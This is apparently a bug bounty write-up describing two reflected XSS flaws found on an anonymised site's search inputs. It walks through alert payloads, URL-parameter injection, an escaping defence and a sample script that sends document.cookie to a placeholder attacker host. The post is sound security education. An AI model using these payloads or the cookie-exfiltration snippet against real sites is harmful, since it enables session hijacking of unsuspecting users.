In part 2, I will be going over how I found my first real-world vulnerabilities. If you haven’t read part 1, make sure to go check it out! Since I don’t want to disclose the site these bugs were found on, I will be referring to the fictitious website www.victim.com.
I was a frequent visitor of www.victim.com, and they made changes to some of their features. I knew they had a bug bounty program so I decided to start poking around to see if I could find anything.
They had a few new search bars, and search bars are notorious for a common vulnerability called cross-site scripting (XSS). I’ll repost some of the information about XSS from one of my other articles, “This SIMPLE trick will exploit image uploads — $2500 TikTok bug bounty.”:
Cross-site Scripting (XSS) is a security headache for all web application developers. In this type of vulnerability, attackers somehow inject malicious JavaScript code, or “scripts,” into a benign web app. If the attacker can successfully embed the script, then the script will have access to important user information. When a victim visits said web app, the malicious script can steal the user’s cookies or other account credentials. The traditional example of XSS is testing an input field by adding the following payload:
<script> alert(“TEST”); </script>
If an alert box pops up saying “TEST,” then XSS is possible. The script could be replaced with a much more dangerous one that sends the visitor’s session document.cookie to the hacker. Many modern web frameworks have some sort of defense against easy-to-find XSS attacks, but hackers keep coming up with interesting ways to bypass these filters. Ismail Tasdelen has compiled a pretty awesome list of payloads to test for XSS on GitHub, and @XssPayloads consistently tweets out newly discovered payloads. (Source: me)
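Those framework defenses usually boil down to output encoding. Here is a minimal sketch, my own illustration rather than any particular framework’s code, of how escaping the handful of HTML-significant characters neutralizes a payload:

```javascript
// Minimal sketch of output encoding: escaping these five characters
// means reflected user input is displayed as text instead of being
// parsed as HTML by the browser. (Illustrative only.)
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;") // must be escaped first
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(escapeHtml('<script> alert("TEST"); </script>'));
// The angle brackets come out as &lt; and &gt;, so no script executes
```

Bypassing XSS filters is usually about finding some context the encoding (or a weaker, blocklist-based filter) doesn’t cover.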
Now that some of the basics of XSS are covered, I’ll go into the vulnerabilities I found. To protect the anonymity of the site, I’ll be using Google’s XSS Game to show the results.
On the first input I found, I decided to test the most basic XSS payload: <h1> test </h1>. The reason I didn’t immediately try a <script> tag was that websites sometimes defend against <script> tags but not <h1> tags, since <h1> tags aren’t malicious. However, once I saw the <h1> tag rendering as HTML, I knew the input wasn’t being parsed correctly.
The above doesn’t necessarily mean that the site is vulnerable yet, just that it isn’t properly sanitizing inputs. Rather, it is taking any user input and displaying it in the HTML. Next, I tried the most basic malicious payload: <script> alert(1); </script>. Once again, success! Now I knew that the site was vulnerable to an XSS attack. Since www.victim.com was an authenticated site, I then changed the payload of the alert to be the value of document.cookie. Note: on the website below, there are no cookies, so I just added the word “cookies” instead of document.cookie so the alert wouldn’t be blank.
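To make the vulnerable pattern concrete, here is a hypothetical sketch of what the site was effectively doing. The function name and markup are my own invention, not www.victim.com’s actual code:

```javascript
// Hypothetical sketch of the vulnerable pattern: user input is
// interpolated straight into the HTML with no sanitization, so any
// tags in the input are rendered (and any scripts executed) by the
// victim's browser.
function renderResults(userInput) {
  return `<h1> Results for: ${userInput} </h1>`;
}

console.log(renderResults("<script> alert(1); </script>"));
// The <script> tag survives intact in the markup, so the alert fires
```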
It’s important to demonstrate the impact of this attack. As you can see in the picture above, the link is generated. If you were to visit that link, the alert would pop up immediately as the script is loaded. The same thing occurs on www.victim.com, even though www.victim.com has two-factor authentication. Instead of popping an alert, the <script> could load a more sophisticated piece of JavaScript that reads the logged-in user’s document.cookie and then sends it to the attacker’s server. The attacker could then load the stolen cookies into their own browser and perform actions as the user.
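That exfiltration step can be sketched like this. The domain attacker.example and the helper name are placeholders of my own, not anything from the real report:

```javascript
// Hypothetical sketch of a cookie-stealing payload.
// attacker.example is a placeholder for a server the attacker controls.
function buildStealUrl(cookie) {
  // URL-encode the cookie string so it survives as a query parameter
  return "https://attacker.example/steal?c=" + encodeURIComponent(cookie);
}

// In the victim's browser, the injected script might run something like:
//   new Image().src = buildStealUrl(document.cookie);
// which silently fires a request carrying the session cookie.
console.log(buildStealUrl("session=abc123"));
// → https://attacker.example/steal?c=session%3Dabc123
```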
I found another new input field on a different page of www.victim.com and repeated the same steps as above. However, when I tried the standard <script> alert(1); </script>, something unusual happened. The alert box did not pop up, but the site started rendering some of the other URL parameters on the page, along with the source code of the HTML file.
Even though the initial script wasn’t technically doing anything malicious, I realized that because the site was rendering a portion of the URL as straight HTML, it might be possible to modify that URL to show what was actually going on. So I removed param2 from the URL and replaced it with a <script> alert(2); </script> tag.
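That step of dropping the original parameter value and substituting a payload can be sketched like this. The URL and parameter names are placeholders, not the real site’s:

```javascript
// Hypothetical reconstruction of building the malicious link:
// take the URL whose parameters get reflected, and swap param2's
// value for a script payload. (Placeholder URL and parameter names.)
const link = new URL("https://www.victim.com/search?param1=foo&param2=bar");
link.searchParams.set("param2", "<script> alert(2); </script>");

// searchParams percent-encodes the payload in the link itself;
// the vulnerable page decodes it and reflects it as raw HTML.
console.log(link.toString());
```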
The impact was the same as the previous vulnerability.
These were simple, medium-severity vulnerabilities that took very little time to investigate. They still require a victim to click on the links, but since the domain of the website is legitimate, it’s easier to trick someone into clicking. I was lucky to know that the website was launching feature updates, which let me find these bugs first, but websites are constantly updating and introducing new bugs.
If you haven’t checked out part 1 yet, make sure to give it a read! Hope you found this helpful!
Want to Connect? Please consider contacting me at [email protected], following me on Medium, buying me a coffee, following me on Twitter, or connecting with me on LinkedIn!